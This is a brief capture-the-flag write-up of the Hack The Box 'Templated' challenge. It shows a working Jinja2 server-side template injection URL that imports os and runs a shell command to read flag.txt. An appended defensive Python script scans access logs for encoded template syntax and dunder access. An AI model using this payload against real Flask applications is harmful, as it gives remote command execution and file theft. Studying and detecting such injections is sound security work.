First, start the challenge instance.

Hackthebox templated web challenge quick writeup

On visiting the host, we see that the site runs Flask/Jinja2.

So I searched for an exploit.

Checking for SSTI

I found an article about SSTI (server-side template injection) in Jinja2:

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

http://165.22.124.155:31361/%7B%7Brequest.application.__globals__.__builtins__.__import__('os').popen('cat%20flag.txt').read()%7D%7D
And we got the flag successfully.
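
Requests like the one above show up in web server access logs as URL-encoded Jinja2 delimiters in the request path. The following is an added example, not part of the original writeup: a standard-library Python scan that decodes each request target (including double encoding) and flags template syntax. The log lines, function names and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /%7B%7B7*7%7D%7D HTTP/1.1" 404 79',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /%257B%257Bconfig%257D%257D HTTP/1.1" 404 90',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=%7Bjson%7D HTTP/1.1" 200 230',
    '203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /%7B%7Brequest.application.__globals__%7D%7D HTTP/1.1" 404 99',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)  # Jinja2 expression or statement
DUNDER_RE = re.compile(r"__\w+__")  # Python internals reached from inside a template

def fully_decode(target, max_rounds=3):
    # Percent-decode repeatedly so double-encoded delimiters (%257B) are seen too.
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    # None for ordinary requests; a verdict label when template syntax is present.
    hits = TEMPLATE_RE.findall(fully_decode(target))
    if not hits:
        return None
    if any(DUNDER_RE.search(hit) for hit in hits):
        return "template-syntax+dunder"
    return "template-syntax"

def scan(lines):
    # Returns (line number, verdict, decoded request target) for each flagged line.
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        verdict = classify(match.group("target"))
        if verdict:
            findings.append((number, verdict, fully_decode(match.group("target"))))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Single braces such as `{json}` are not flagged, which keeps ordinary query strings out of the findings.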
